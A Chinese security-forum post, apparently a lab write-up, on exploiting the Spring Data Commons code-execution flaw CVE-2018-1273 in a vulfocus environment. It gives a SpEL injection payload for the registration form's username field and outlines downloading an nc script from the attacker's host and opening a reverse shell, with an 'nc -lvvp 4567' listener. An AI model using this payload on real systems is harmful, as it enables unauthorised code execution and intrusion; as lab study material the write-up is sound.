安全矩阵

 找回密码
 立即注册
搜索
查看: 1484|回复: 0

vulfocus spring 代码执行 (CVE-2018-1273)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-9-17 19:40:47 | 显示全部楼层 |阅读模式
spring
代码执行
(CVE-2018-1273)
漏洞利用:
打开网站 ip/users

填写信息 点击 Register user 然后抓包
改包
username[#this.getClass().forName("java.lang.Runtime").getRuntime().e
xec("AAAA")]=xxx&password=xxx&repeatedPassword=xxx
Exec 内为命令执行
思路:主机创建一个服务器并放入一个 nc 命令脚本用于反弹 shell 出来
在 exec 内先创建文件夹,然后在修改一次 exec 执行命令连接我们的服务器并下
载 nc 命令脚本到新创建的文件夹
再修改一次 exec 去执行此脚本
并进行反弹到我们的主机进行监听
0x01
创建文件夹


0x02
下载本地的 nc 脚本


0x03
再执行该脚本


nc -lvvp 4567 监听
获取 flag



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:54 , Processed in 0.013162 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表